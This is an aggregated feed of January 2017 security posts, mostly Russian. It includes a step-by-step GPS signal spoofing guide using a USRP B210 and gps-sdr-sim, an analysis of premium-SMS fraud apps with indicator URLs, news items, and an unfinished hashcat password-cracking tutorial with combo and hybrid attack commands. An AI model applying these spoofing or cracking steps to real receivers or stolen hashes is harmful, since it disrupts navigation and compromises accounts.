    При тестировании антенн, особенно новых их конструкций, в обычной городской комнате возникают проблемы с хорошей радио-видимостью спутников. Грубо говоря, сложно понять новая антенна лучше или хуже старой, измененная схема согласования РПУ с антенной дала или нет улучшение чувствительности системы. Про антенные решетки вообще говорить не приходится. К тому же, лично в моем случае, присутствует какая-то помеха, которая мешает приему. Стоит отойти от окна и приемник теряет спутники, хотя прямая видимость четверти неба сохраняется.

    Летом дача становится спасением. Там почти свободное небо и нет никаких помех. Но туда нужно либо ехать со всем имуществом, либо держать там его дополнительный комплект. Есть еще товарищи с прошлой работы, которые дают поработать в безэховой камере. Не знаю за что, но бывает такое счастье.

    В общем, нелегка доля разработчика.


    Удача

    Недавно мне посчастливилось подобраться к решению этой проблемы. Я всегда знал о симуляторах навигационных сигналов, но они были дороги для меня. Тут сложилось несколько счастливых событий.


  • Один товарищ из Москвы при встрече рассказал о симуляторе GPS, опубликованном профессором Эбинумой в исходных текстах.


  • Я уже был знаком с профессором по переписке и у меня сложилось доверие к нему и его разработкам. Можно было начинать работу, надеясь на консультацию профессора.


  • У меня уже давно завалялась плата USRP B210, а она была указана в списке поддерживаемых плат.
  • Думалось, что было бы классно получить возможность тестировать антенны и РПУ стабильно и предсказуемо.

    А потом, думалось, это ведь наша почти традиционная русская забава — обманывать GPS. Я вспомнил, как сам недавно был отброшен информационно из района метро Третьяковская в аэропорт Внуково. А можно даже сделать что-то типа матрешки — запустить на Третьяковской ложный сигнал, как будто я на Третьяковской.


    Иллюзия, но она может помочь успокоить многих неспокойных людей, особенно весной. И как же это по-русски, черт возьми!

    Ведь если им можно, то нам почему нельзя? Но надо особо оговориться, что запуск симулятора проводился на минимальной мощности 10 кВт и даже без подключения антенны выпали все волосы на голове. Просим всех при экспериментах быть аккуратными и надевать шапочку из фольги, чтобы не разрушить навигационное пространство окружающих людей и спецслужб. Также стоит напомнить, что незнание законов не освобождает от ответственности. И о том, что у нас в России принято не зарекаться не только от сумы.

    Все, долой философию! К делу! Меньше букв, больше картинок!


    Как запустить

    Для запуска своей системы глобального позиционирования раньше нам потребовалась бы орбитальная группировка спутников, наземные станции и т.д. Теперь всё проще.

    Нам необходимо:


  • Компьютер с операционной системой типа Виндуз или Линукс и, желательно, с портом USB 3.0. На порту 2.0 я не тестировал, но должно заработать.


  • Плата USRP b210 (возможны и другие варианты).


  • Сгенерированный файл с сигналом, либо программа для его генерации GPS-SDR-SIM от проф. Эбинумы.




  • Порядок установки

    Для запуска всего этого добра на компьютер надо неторопясь и аккуратно установить от производителя платы набор софта. Хотя, может, это и не обязательно. Но пусть будет. При установке под виндуз оно иногда жалуется, что не может добавить себя в PATH, но это не мешает, так как из всего этого добра мне понадобилась только утилитка uhd_find_devices.exe, которая позволила понять, увидела ли вообще система эту плату. Найти утилиту можно по адресу:

    C:/UHD/bin/uhd_find_devices.exe

    Затем втыкаем плату и открываем диспетчер задач. Где можно обнаружить, что драйверов под устройство автоматом не установилось. Что же – бывает. Вручную с помощью программки zadig указываем системе, что под плату надо использовать драйвера libusb, т.е. winusb.

    После того, как система подцепила стандартный драйвер, можно запустить uhd_find_devices из набора софта от производителя платы. Эта утилита должна найти плату и прошить её контроллер (там стоит FX3 от Cypress). Кажется, после этого устройство изменит свой PID и надо будет рассказывать системе (с помощью zadig), что и под это устройство можно использовать стандартные драйвера winusb.

    Конечно же оно с первого раза не заработает. И конечно же это можно вылечить путем отсоединения платы и подсоединения обратно. Вот подробная инструкция.

    Необходимо установить гнурадио, которое внутри себя содержит пайтон-питон. Я взял отсюда последнюю версию под AVX2 процессоры.

    Мне было лень настраивать правильным образом окружение, поэтому я воспользовался скриптом, входящим в комплект: C:/GNURadio-3.7/bin/run_gr.bat

    Через него я буду запускать скрипт для посылки сгенерированного файла в плату b210.

    Для удобства путь до этого скрипта надо добавить в переменную окружения PATH.


    Генерация сигнала

    Исходники берем тут. Что приятно удивило, так это легкость и простота сборки. Никаких зависимостей, никаких дополнительных действий. Все бы так.

    Сборка под линукс

    $ gcc gpssim.c -lm -O3 -o gps-sdr-sim

    Сборка под виндуз


  • Start Visual Studio. Запустить студию (я использовал 2015)


  • Create an empty project for a console application. Создать пустой консольный проект. Именно пустой!


  • On the Solution Explorer at right, add "gpssim.c" and "getopt.c" to the Souce Files folder. Добавить два сишных файла в проект.


  • Select "Release" in Solution Configurations drop-down list. Изменить тип сборки на релизный, выбрать архитектуру x86 / amd64.


  • Build the solution. Собственно, собрать.
  • Я под линукс не собирал, т.к. была необходимость запустить всё на конкретной машине, а на ней стояла десятка.

    Подробное описание параметров генератора есть в ридми. Для начала можно не разбираться, а сделать очень просто, сгенерировать сигнал таким образом:

    gps-sdr-sim.exe -e brdc3540.14n -s 2500000 -l 30.286502,120.032669,100 -b 8 -d 300 -v -o sim.bin

    Вы можете взять строчку из ридми, но она сгенерирует сигнал с ЧД=2,6 МГц, тогда и b210 надо будет настраивать на ту же ЧД (частота дискретизации). Если сгенерировать с одной частотой, а на плату выдавать с другой, то, конечно же, ничего не заработает.

    Сигнал на плату я подавал с помощью такой команды:

    run_gr.bat gps-sdr-sim-uhd.py -t sim.bin -s 2500000 -x 40

    40 — это уровень. 2500000 — это ЧД. Подробное описание настроек можно увидеть в файле gps-sdr-sim-uhd.py, он очень прост для понимания.

    Для b210 значение ЧД должно нацело делить частоту внутреннего генератора, а он там, кажется 40 МГц.


    Запуск

    image

    А теперь самое интересное.


  • Отключаем плату.


  • Подключаем плату.


  • Запускаем uhd_find_devices


  • Если не определилось, то goto 1.


  • Запускаем transmit.bat, следим за логом.


  • В определенный момент на плате загорится второй диод, что будет означать, что всё уже начало излучаться.
  • Если в логах постоянно выводится буква U, значит, ваша система не успевает подсовывать данные в плату. Вам стоит проверить, не работает ли что-то на фоне и не указали ли вы очень высокую ЧД.

    Через некоторое время (до 3 минут) все устройства начнут определять местоположение как заданное вами. Но перед этим они внезапно потеряют текущее положение.

    image

    Внимательно прочитав инструкцию к программе проф. Эбинумы можно понять, как сгенерировать файл с изменяющимся местоположением, как использовать другие даты и прочее.


    Выводы
  • Есть проверенный способ собрать самому из недорогих средств симулятор GPS-сигнала. Это большая радость для разработчиков. Спасибо профессору Эбинуме!


  • Не все приемники подвержены влиянию имитационной помехи. Некоторые имеют защиту.


  • Есть опасность, что такой симулятор будет использоваться или уже используется преступными элементами для своих целей. Сейчас уже есть приемники с функцией защиты от подмены сигнала. Нужно тестировать эту функцию и использовать такие приемники в ответственных приложениях.


  • Есть вероятность, что в будущем у людей появятся малогабаритные и недорогие устройства для подмены навигационного сигнала, которые они будут использовать для своих почти бытовых нужд, начиная от обмана супругов и заканчивая обманом геоигр типа PokemonGO. Приемники, которые окажутся по соседству, должны будут как-то справляться с наличием большого количества таких имитационных помех.
  • И за последние два пункта — спасибо профессору Эбинуме! Разработчикам будет чем заняться по обе стороны баррикад.

    Скоро я расскажу о попытках избавиться от помехи и из этого получилось.

    orig: 2017-01-23 09:52:07 / https://habrahabr.ru/post/320206/ (click post title)



    Expensive free apps

    no-image

    This post is the result of collaboration between Elevenpaths (Telefónica Cyber Security Unit) and Kaspersky Lab. Both companies have used their own expertise, researchers and tools, such as Tacyt (an innovative tool for the monitoring and analysis of mobile threats) and GReAT’s internal tools and resources.

    Big Brother and Google Play

    Fraudulent apps trying to send Premium SMS messages or trying to call to high rate phone numbers are not something new. Actually, it is easy to find them specially in Spain, Russia and some other european countries. Of course, it is much more interesting to talk about how certain groups bypass detection mechanisms such as those used by Google Play, since this has become difficult to achieve in the past few years.

    Some years ago it was pretty easy to upload a dialer (or other similar fraudulent app) to Google Play [1] [2], but new detection mechanisms made attacker to focus on alternative markets, at least for a period of time.

    Recently, we have found a Spanish group that successfully uploaded a non-official Big Brother (Gran Hermano) TV show app, which is one of the most popular TV shows in Spain even being on the air for 16 years now.

    Expensive free apps

    [Analysis:cdd254ee6310331a82e96f32901c67c74ae12425]

    This was not a very sophisticated app, but they were able to upload it into Google Play using an old trick. First, they uploaded a clean an innocuous version that of course passed or the security controls from Google Play. Then, some days later, a new version was uploaded with a major features update, including subscription to paying services. This trick was extremely simple but successful, since the app was in the Google Play for around two months (from mid September to mid November 2015).

    Expensive free apps

    It seems this was not the first time this group tried to upload a Big Brother-like app. We have detected (via Tacyt [3]) at least another 4 similar applications that, regarding some particular logging messages we found in the code, could have the same origin:

    com.granhermano.gh16_1; from 2015-09-15 to 2015-09-22;
    com.granhermano162; from 2015-09-29 to 2015-11-14;
    com.granhermanodieciseis; from 2015-09-29 to 2015-11-11
    com.granh.gh16_3; from 2015-10-05 to 2015-10-15;
    com.hisusdk; from 2015-09-16 to 2015-11-14 (the one analyzed).

    As we said before, this group was found to be using a specific string “caca” as a logging tag, which is not something usual:

    Expensive free apps

    The word “caca” is a colloquial word in Spanish referring to an excrement (very similar to the word “poo” in English). We could find it in certain testing code, referring to lines of code that should be removed later, but it is unusual to find it in such similar applications and used in the same way. Because of that, it makes sense to think that those applications were developed by the same group. Other strings and function names used in the code make us conclude that those applications could be developer by native Spanish speakers.

    This app is using several commercial third party services such as Parse.com for the first network communication. This first API call is used in order to get all the information necessary to run further actions (URLs, authentication, etc).

    {“results”:[{“Funcionamiento”:” Ahora la única pestaña importante es la de VOT.”,”action1″:”http://tempuri.org/getPinCode”,”action2″:”http://tempuri.org/crearSubscripcion”,”activa”:”si”,”createdAt”:”2015-09-08T16:17:24.550Z”,”estado”:true,”id_categoria”:”2608″,”id_subscripcion”:”400″,”metodo1″:”getPinCode”,”metodo2″:”crearSubscripcion”,”namespace”:”http://tempuri.org/”,”nombreApp”:”GH16 – españa”,”numero_corto”:”795059″,”numero_sms”:”+34911067088″,”objectId”:”tNREzkEocZ”,”password”:”15xw7v7u”,”updatedAt”:”2015-11-27T10:28:00.406Z”,”url”:”http://ws.alertas.aplicacionesmonsan.net/WebSubscription.asmx?WSDL”,”urlcode”:”http://spamea.me/getcode.php?code=”,”usuario”:”yourmob”,”vot”:true}]}

    As we can see above, it references to different URLs:

    spamea.me is service that no longer exists at the time of writing, but that used to be hosted on 107.6.184.212, which seems a hosting service shared with many other websites.

    Expensive free apps

    ws.alertas.aplicacionesmonsan.net is legitimate service focused on mobile monetization, including SMS premium and direct carrier billing. It is used from the app in order to subscribe the user to a service called “yourmob.com”.

    Expensive free apps

    Of course, using paying services is not malicious itself, since it is legitimate that companies could bill for their services, but user should be clearly noticed about service cost and conditions beforehand.

    Expensive free apps

    Despite we found a reference to “Terms and Conditions” (in Spanish) poiting to the website servimob.com , we could not verify that this information is shown to users and, anyway, users don’t have the opportunity to reject the agreement and don’t be subscribed.

    Presence outside Google Play

    It make sense that if a group have included this kind of app in Google Play, They were going to try something similar using other app sources (thanks to Facundo J. Sánchez that spotted this).

    Analysis: 9b47070e65f81d253c2452edc5a0eb9cd17447f4

    Expensive free apps

    This app worked slightly different. It uses other 3rd party services and it sends Premium SMSs for monetization. They got from the server what number to use, for how many seconds and if the screen should be on or off.

    We found that they used very similar words for comments and method names (most of them in Spanish, including “caca”), same topic (Big Brother), references to “yourmob” and much more, so definitely we can link it with the Spanish group mentioned before.

    Expensive free apps

    One of the webservices used by this application (http://104.238.188.38/806/) exposed a control panel showing information about people using this app:

    Expensive free apps

    As you probably know, groups developing this kind of apps usually reuse their servers and supporting infrastructure for multiple apps, for example this one:

    https://www.virustotal.com/en-gb/file/cc2895442fce0145731b8e448d57e343d17ca0d4491b7fd452e6b9aaa4c2508a/analysis/

    It was using this vps as well http://vps237553.ovh.net. Some of the panels and services provided by the VPS were located here:

    http://vps237553.ovh.net/nexmo/getcode.php?code=
    http://vps237553.ovh.net/polonia/autodirect1.php
    http://vps237553.ovh.net/polonia/autodirect2.php
    http://vps237553.ovh.net/polonia/guardar_instalacion.php
    http://vps237553.ovh.net/polonia/guardar_numero.php
    http://vps237553.ovh.net/polonia/guardar_numero.php?androidID=
    http://vps237553.ovh.net/polonia/guardar_sms.php
    http://vps237553.ovh.net/polonia/push_recibido.php
    http://vps237553.ovh.net/polonia/panel.php
    http://vps237553.ovh.net/nexmo/

    Expensive free apps

    As we can see in their control panel, they have been quite successful in terms of spread, since there are registered phones from many different countries (Spain, Holland, Poland, etc).

    In addition, an iterative search on terms such as IP addresses, unique paths, etc, has shown that other apps could be using the same supporting infrastructure that was shown above, including the following IP addresses and domain names:

    In particular, 45.32.236.127 was pointed by different domain names in the past months:

    These domains have probably been used for fraudulent initiatives such as phishing attacks, since they are very similar to well-known and legitimate services.

    Something that kept our attention was that “vps237553.ovh.net”, used from a sample and resolving to 51.255.199.164, was also used at some point (June 2016 regarding our passive DNS) by “servimob.com” domain (same domain referenced in the app from Google Play).

    Expensive free apps

    Back to Google Play

    As you can imagine, they tried again to upload a new app to Google Play, following a similar philosophy and techniques that we have seen before.

    Expensive free apps

    e49faf379b827ee8d3a777e69f3f9bd3e559ba03
    11a131c23e6427dd7e0e47280dd8f421febdc4f7

    These apps were available in Google Play for a few weeks in September 2016, using similar techniques, especially to those applications that we found outside Google Play.

    Conclusions

    This Spanish group has been quite successful on uploading this kind of apps in Google Play, using interesting topics such as the Big Brother TV show. Spain and Poland have been two countries traditionally targeted by SMS scams and similar malware. However, we have never seen in the past few years any group that was able to upload apps to legitimate markets in such an easy way. Perhaps the key point is that they try to be close enough to the border between a legitimate business and a malicious one.

    orig: 2017-01-23 09:39:09 / https://securelist.com/blog/mobile/77083/expensive-free-apps/ (click post title)



    В США из-за хакерских взломов расследуют деятельность Yahoo

    Власти США начали расследование против компании Yahooinfo-icon!. Следователи подозревают, что компания могла предупредить своих инвесторов о двух крупных утечках информации быстрее, чем она это сделала. Об этом сообщает The Wall Street Journal со ссылкой на знакомые с ситуацией источники.

    Комиссия по ценным бумагам и биржам США начала расследование и в декабре запросила у компании документы. Комиссия пытается узнать, соблюдалось ли гражданское законодательство во время открытия компанией информации о кибератаках. Комиссия требует от компаний заявлять о кибератаках, как только определяется, что взлом повлиял на инвесторов, отмечает газета.

    Расследование направлено на утечку Yahoo! 2014 года, когда были похищены данные 500 млн пользователей, сообщают источники WSJ. Похищенная хакерами база включала в себя имена пользователей, их адреса электронной почты, номера телефонов, логины и пароли, а также другую личную информацию. Yahoo! заявила об этой утечке в сентябре 2016 года, до сих пор не объяснив, почему на открытие информации ушло два года, пишет rbc.ru.

    Кроме того, в декабре 2016 года Yahoo! сообщила, что установила новый взлом системы, который произошел в 2013 году, когда были похищены данные более 1 млрд пользователей.

    WSJ со ссылкой на источники отмечает, что расследование находится на ранней стадии, поэтому преждевременно говорить о том, приведет ли это к публичным последствиям для компании.

    orig: 2017-01-23 09:16:03 / https://www.anti-malware.ru/news/2017-01-23/21921 (click post title)



    Слово "четыре" заменить словом "три": проект изменений в 17 Приказе


    Опубликован проект изменений, которые планируется внести в 17 Приказ ФСТЭК. 

    Коротко пройдусь по основным пунктам.

    1) Как и ожидалось, от 4 класса защищенности собираются отказаться. Останутся 3 класса. Состав защитных мер при этом не меняется.


     

    2) Теперь официально при разработке модели угроз должен использоваться банк данных угроз ФСТЭК (bdu.fstec.ru). Прощай, полюбившийся многим копи-паст из Базовой модели угроз 2008 года. Правда необходимой методики для использования банка угроз нет. Придется его адаптировать под старую методику.

    3) Для 1 и 2 классов защищенности ГИС теперь должны будут проводиться пентесты!

     

    4) В явном виде прописана возможность размещения систем в аттестованных ЦОДах.

     

    5) Теперь интеграторам в проектах по аттестации потребуется как минимум два человека ;) 

    Вот такие изменения ждут нас в ближайшее время. Самое интересное, на мой взгляд - появление пентестов. С одной стороны, сдвиг требований регулятора в сторону практической безопасности можно только приветствовать. С другой стороны, аттестация и пентест, мягко говоря, немного отличаются. Аттестация сейчас (к сожалению) частенько представляет собой формальное копирование шаблонных документов, с единственной целью - получение заветного аттестата. Пентест - совсем другой уровень, требующий совсем иных трудозатрат и компетенций. Хватит ли компаниям, специализирующимся на аттестации, ресурсов для проведения пентестов? И не превратится ли пентест, вслед за аттестацией, в формальность? Поживем-увидим. В любом случае рынок аттестации немного встряхнется.

    orig: 2017-01-23 08:48:00 / http://crypto-anarchist.blogspot.com/2017/01/17.html (click post title)



    Обзор инцидентов безопасности за прошлую неделю

    Краткий обзор главных событий в мире ИБ за период с 16 по 22 января 2017 года.

    Сезон зимних праздников закончился, и киберпреступники вернулись к привычной активности. Прошедшая неделя ознаменовалась сообщениями о ряде кибератак, утечках данных и мошеннических кампаниях. Предлагаем ознакомиться с кратким обзором главных событий в мире ИБ за период с 16 по 22 января 2017 года.

    В начале прошлой недели стало известно о мошеннической кампании, угрожающей пользователям Facebook. С целью завладеть чужими учетными данными со взломанных аккаунтов злоумышленники рассылают сообщения с темой «You are in this Video?» («Вы на этом видео?») и вредоносной ссылкой, ведущей либо на поддельную форму авторизации, либо на сайт с вредоносным ПО.

    Жертвами вредоносной кампании также стали пользователи Chrome. С начала текущего года ИБ-эксперты зафиксировали новый виток операции EITest, проводимой злоумышленниками по крайней мере с 2014 года. В ходе кампании используется цепь скомпрометированных легитимных сайтов, распространяющих различные наборы эксплоитов.

    Продолжают свою активность хакеры, ответственные за взломы незащищенных баз данных MongoDB, однако теперь под их прицел попали кластеры Elasticsearch. Злоумышленники удаляют данные из кластеров и требуют выкуп за их восстановление в размере 0,2 биткойна.

    Исследователь безопасности MalwareHunterTeam обнаружил новое семейство вредоносного ПО, позволяющее злоумышленникам получить полный контроль над целевой системой при помощи команд по IRC-каналу. Вероятно, GhostAdmin является вариантом активного 3-4 года назад вредоносного ПО CrimeScene.

    Специалисты компании «Доктор Веб» предупредили о появлении нового Android-трояна, способного внедряться в активный процесс Play Маркет и накручивать счетчик установок в каталоге Google Play. Android.Skyfin.1.origin загружает приложения и сохраняет их на карту памяти устройства  без последующей установки. Тем самым вредонос повышает шансы избежать обнаружения и может продолжать накручивать счетчик установок, искусственно повышая популярность программ в каталоге.

    Исследователи «Доктор Веб» также обнаружили на одном из хакерских форумов опубликованный исходный код неизвестного ранее банковского трояна для Android-устройств. BankBot распространяется под видом безобидных приложений и может похищать данные жертв, отправлять и перехватывать SMS-сообщения, запрашивать права администратора, выполнять USSD-запросы, получать из телефонной книги список номеров всех контактов, отслеживать по GPS местоположение устройства, отображать фишинговые окна и т.д.

    По данным экспертов компании Forcepoint Security Labs, новые модификации вредоносного ПО Carbanak используют для хостинга своей C&C-инфраструктуры сервисы Google – Google Apps Script, Google Sheets и Google Forms. Как отмечают специалисты, гораздо эффективнее использовать в качестве независимого C&C-канала сервисы Google, чем новые домены или домены без репутации.

    Эксперты компании Malwarebytes сообщили о шпионском  ПО для Mac. Бэкдор Quimitchin использует устаревший код и атакует медицинские исследовательские лаборатории. Основными функциями вредоноса является похищение снимков экрана и доступ к web-камерам на зараженных Mac. Apple назвала его Fruitfly и пообещала вскоре выпустить решение безопасности для борьбы с ним.

    На прошлой неделе не обошлось и без сообщений об утечках информации. К примеру, неизвестные атаковали хакерский форум Darkode и похитили базу данных его пользователей. По признанию одного из администраторов ресурса, отчасти атака оказалась успешной из-за повторного применения пароля, уже использовавшегося им на другом взломанном сайте.

    Об утечке данных пользователей своего форума также сообщил разработчик игры Clash of Clans компания Supercell. Из-за уязвимости в движке vBulletin злоумышленникам удалось похитить электронные адреса и зашифрованные пароли порядка 1 млн пользователей.

    Завершилась неделя взломом учетной записи в Twitter, принадлежащей авторитетному изданию The New York Times. Со ссылкой на якобы утекшее заявление президента РФ Владимира Путина хакеры опубликовали ложный твит о готовящемся ракетном ударе со стороны России.

    orig: 2017-01-23 07:44:59 / http://www.securitylab.ru/news/485099.php (click post title)



    Проект OpenBugBounty расширил программу выплаты вознаграждений

    В рамках программы будут рассматриваться не только XSS-, но и CSRF-уязвимости.

    Организаторы OpenBugBounty изменили условия программы по выплате вознаграждений за найденные уязвимости. Теперь в рамках программы будут рассматриваться не только XSS-, но и CSRF-уязвимости.

    Согласно сообщению на форуме OpenBugBounty, ввиду сравнительной сложности процесса верификации CSRF-уязвимостей, новое правило будет действовать только в отношении исследователей, ранее предоставивших информацию о 20 подтвержденных XSS-уязвимостях. По словам организаторов, в будущем данное ограничение может быть снято.

    Напомним, сервис xssposed.org запустил программу OpenBugBounty в июле 2015 года. В рамках программы каждый исследователь, заявивший об обнаруженной XSS-уязвимости, может получить вознаграждение, причем не только от владельцев уязвимых сайтов, но и от любого члена сообщества.

    orig: 2017-01-23 07:44:46 / http://www.securitylab.ru/news/485098.php (click post title)



    Подбор паролей длиной 12 символов и выше

    При помощи современного оборудования, мы можем почти наверняка расшифровать быстрый хеш, например, MD5, NTLM, SHA1 и т. д. за разумное время.

    Автор: NETMUX

    Что я подразумеваю, когда говорю о взломе пароля длиной 12 и более символов? Я утверждаю, что при помощи современного оборудования, например, данной «бюджетной» установки, мы можем почти наверняка расшифровать быстрый хеш, например, MD5, NTLM, SHA1 и т. д. за разумное время. На практике подбор в лоб последовательностей длиной 8 и более символов бесперспективен в случае с распространенными алгоритмами хеширования. Когда же мы касаемся особенностей национального языка и человеческой психологии (например, среднее английское слово длиной 4.79 символа, а люди предпочитают использовать несколько слов при составлении паролей размером 10 и более символов), то здесь уже открываются более интересные возможности с точки зрения подбора подобных паролей. Более подробно о различных инструментах подбора рассказано в книге Hash Crack.  

    Почему пароли длиной 12 и более символов уязвимы?

    Люди, создающие пароли длиной 10 и более символов вручную, как правило, используют стандартные слова и фразы. Почему? Потому что запомнить пароль «horsebattery123» намного проще, чем «GFj27ef8%k$39». Здесь мы сталкиваемся с инстинктом следования по пути наименьшего сопротивления, который, в случае с созданием паролей, будет проявлен до тех пор, пока менеджеры паролей не станут использоваться более массово. Я согласен, что серия рисунков, посвященная устойчивости пароля, вполне имеет право на жизнь, но только в случае небыстрыми алгоритмами хеширования, наподобие bcrypt. В этой статье будут показаны примеры атак типа Combo (когда комбинируются элементы словаря) и Hybrid (когда к атаке типа Combo добавляется прямой перебор) при помощи утилиты Hashcat, которые, надеюсь, расширят ваш арсенал. В примерах ниже будет продемонстрировано, как злоумышленник может эффективно перебрать пространство ключей и взломать пароли, которые на первый взгляд кажутся устойчивыми.

    Базовая информация об атаках типа Combo и Hybrid

    Комбинационная атака (Combo): комбинируются все элементы из двух словарей.

    Пример
    Входные данные: dictionary1.txt dictionary2.txt
    Комбинации паролей:
    pass => password, passpass, passlion
    word => wordpass, wordword, wordlion
    lion => lionpass, lionword, lionlion

    Гибридная атака (Hybrid): представляет собой атаку по словарю с примесью комбинаций сгенерированных по определенному шаблону.

    Пример
    Входные данные: dictionary.txt ?u?l?l
    Комбинации паролей:
    pass => passAbc, passBcd, passCde
    word => wordAbc, wordBcd, wordCde
    lion => lionAbc, lionBcd, lionCde

    Примечание 1: Последовательность генерации паролей не совсем точна и приведена для описания общей идеи.

    Примечание 2: Более подробные объяснения приведены на сайте Hashcat.

    Комбинационная атака

    Рассмотрим комбинационную атаку с использованием словаря, состоящим из 10 тысяч наиболее употребительных слов в порядке убывания популярности. Анализ проводился при помощи N-грамм и частотного анализа на базе триллионного сборника, собранного поисковой системой Google.

    Рассмотрим пример двух случайно выбранных слов, соединенных в пароль длиной 16 символов, например shippingnovember и осуществляем комбинационную атаку на данный пароль, если бы использовался алгоритм MD5:

    Пример
    hashcat -a 1 -m 0 hash.txt google-10000.txt google-10000.txt

    При переборе всех комбинаций, состоящих из слов, соединенных друг с другом, при помощи современных аппаратных средств пароль взламывается менее чем за одну секунду. При работе с другими, более медленными, алгоритмами пароль также подбирается за разумное время.

    http://res.cloudinary.com/hrscywv4p/image/upload/c_limit,h_9000,w_1200,f_auto,q_90/v1/148712/Screen_Shot_2017-01-01_at_2.35.25_PM_euctqj.png
    Рисунок 1: Время подбора пароля shippingnovember при помощи комбинационной атаки

    Критики могут возразить, мол, если вначале каждого слова сделать заглавные буквы или добавить цифру или специальный символ, то новый пароль (например, ShippingNovember) будет более устойчив. Проверим эту теорию на практике и скомбинируем словарь google-10000 в единый большой массив паролей при помощи утилиты combinator.bin, что позволит нам комбинировать полученные слова в сочетании с правилами.

    Пример
    combinator.bin google-10000.txt google-10000.txt > google-10000-combined.txt

    Теперь, когда у нас есть словарь комбинаций, мы добавляем правила с целью подбора модифицированного пароля (ShippingNovember).

    Пример
    hashcat -a 0 -m 0 hash.txt google-10000-combined.txt -r best64.rule

    http://res.cloudinary.com/hrscywv4p/image/upload/c_limit,h_9000,w_1200,f_auto,q_90/v1/148712/Screen_Shot_2017-01-01_at_4.56.38_PM_yyoi7u.png
    Рисунок 2: Время подбора пароля ShippingNovember при помощи словаря комбинаций и правил

    Новый пароль расшифрован за 28 секунд. Схожим образом добавляются правила, учитывающие специальные символы, различное местонахождение комбинации и так далее. Думаю, вы уловили суть.

    Пароли из 3 слов

    Используя созданный словарь комбинаций, попробуем подобрать пароль из трех слов, например «securityobjectivesbulletin», при помощи комбинационной атаки.

    Пример

    hashcat -a 1 -m 0 hash.txt google-10000-combined.txt google-10000.txt
    http://res.cloudinary.com/hrscywv4p/image/upload/c_limit,h_9000,w_1200,f_auto,q_90/v1/148712/Screen_Shot_2017-01-01_at_5.56.24_PM_wprjxg.png
    Рисунок 3: Время подбора пароля securityobjectivesbulletin

    Схожий пароль с добавлением других символов взломается чуть медленнее. Улавливаете тенденцию?

    Пароли из 4 слов

    Теперь рассмотрим взлом паролей, состоящих из четырех слов (пример: «sourceinterfacesgatheredartists»). В этом случае пространство ключей увеличивается до 10.000.000.000.000.000 кандидатов, но в итоге подбор занимает разумное время. В основном из-за того, что используется алгоритм MD5. Мы создаем новый словарь комбинаций и осуществляем комбинированную атаку при помощи Hashcat.

    Пример
    hashcat -a 1 -m 0 hash.txt google-10000-combined.txt google-10000-combined.txt

    http://res.cloudinary.com/hrscywv4p/image/upload/c_limit,h_9000,w_1200,f_auto,q_90/v1/148712/Screen_Shot_2017-01-02_at_8.24.43_AM_bjesul.png
    Рисунок 4: Время подбора пароля sourceinterfacesgatheredartists

    Процесс перебора при помощи современных аппаратных средств мог занять 4 дня, но правильный кандидат был найден в течение 5 часов 35 минут. Добавление цифр или специальных символов сделало бы пароль вне нашей досягаемости, но использование лишь четырех случайных слов делает пароль уязвимым.

    Гибридная атака

    Гибридные атаки требуют большей находчивости, но когда нужный шаблон найден, находка становится сродни золотому слитку. Особенно незабываемые ощущения доставляет прокрутка расшифрованных паролей в терминале.

    Атака по словарю Google-10000 + маска

    В первом примере мы будем использовать тот же словарь из 10 тысяч наиболее встречающихся слов в качестве базы для генерации кандидатов для перебора. Затем мы воспользуемся пакетом утилит PACK (Password Analysis and Cracking Kit) и словарем hashesorg251015.txt с сайта weakpass.com. Я выбрал именно этот словарь из-за высокого рейтинга успешности и относительно небольшого размера. Мы будем изучать словарь hashesorg и по результатам анализа создадим маски на базе наиболее популярных паролей, ограниченных определенных набором символов. Эти маски будут использоваться в начале и в конце базовых слов из словаря google-10000.txt.

    Пример

    Вначале сгенерируем статистику по маскам на базе паролей длиной 5-6 символов и запишем результаты в отдельный файл (учтите, что процесс генерации может занять некоторое время).

    python statsgen.py hashesorg251015.txt --minlength=5 --maxlength=6 --hiderare -o hashesorg_5or6.masks

    Затем преобразуем маски в формат Hashcat (файл .hcmasks) для последующего использования в гибридных атаках.

    python maskgen.py hashesorg_5or6.masks --optindex -o hashesorg_5or6.hcmask

    Далее в режиме 6 в качестве параметров указывает словарь и набор масок. Алгоритм перебора будет выглядеть следующим образом: берется первая маска и комбинируется с каждым словом из словаря, затем вторая маска, третья и так далее, пока не закончится весь перечень масок. Некоторые атаки могут заканчиваться очень быстро, некоторые осуществляются чуть дольше. Во время тестирования будем подбирать пароль «environmentsqaz472»

    Пример
    hashcat -a 6 -m 0 hash.txt google-1000.txt hashesorg_5or6.hcmask
    http://res.cloudinary.com/hrscywv4p/image/upload/c_limit,h_9000,w_1200,f_auto,q_90/v1/148712/Screen_Shot_2017-01-02_at_6.55.26_PM_z9sk3y.png
    Рисунок 5: Время перебора пароля environmentsqaz472

    Подбор занял около 20 минут. Вначале мы добрались до маски ?l?l?l?d?d?d, а затем в течение 14 взломали пароль.

    Атака на базе словаря Rockyou + Rockyou-1-60.hcmask

    Теперь воспользуемся набором масок, который идет в комплекте с утилитой Hashcat и сгенерирован на основе паролей из набора Rockyou. Данный набор масок разбит на отдельные порции, которые с возрастанием диапазона номеров возрастают по размеру. Размер, как я предполагаю, возрастает из-за процента паролей, на базе которых сгенерирована конкретная порция масок. Мы будем использовать файл с именем rockyou-1-60.hcmask, поскольку там наиболее ходовые маски, которые хорошо зарекомендовали себя при гибридных атаках. Этот набор масок мы будем комбинировать с паролями из словаря Rockyou. В случае с другими словарями будьте осторожны и используйте файлы не слишком большого размера. Иначе атака будет занимать СЛИШКОМ много времени. Обычно я пользуюсь словарями размером менее 500 Мб (и даже меньше) и добавляю маски в начале и в конце слов. Берем случайный пароль «sophia**!» из словаря Rockyou и в начало добавляем случайную дату «1996». В итоге получаем пароль 1996sophia**!. Во время тестов каждая маска будет комбинироваться с элементом словаря Rockyou.

    Пример
    hashcat -a 7 -m 0 hash.txt rockyou-1-60.hcmask rockyou.txt
    http://res.cloudinary.com/hrscywv4p/image/upload/c_limit,h_9000,w_1200,f_auto,q_90/v1/148712/Screen_Shot_2017-01-02_at_7.17.59_PM_qrn3vx.png
    Рисунок 5: Время подбора пароля 1996sophia**!

    Во время перебора через несколько минут дело дошло до маски ?d?d?d?d. Данный пример показан с целью демонстрации процесса и эффективности гибридных атак. Файл rockyou-1-60.hcmask содержит 836 масок, сгенерированных на базе наиболее часто встречающихся паролей из словаря rockyou.txt. Если вам мало этого набора, в комплекте с Hashcat идут все маски, сгенерированные на базе остальных паролей.

    Первые 5 символов + маска

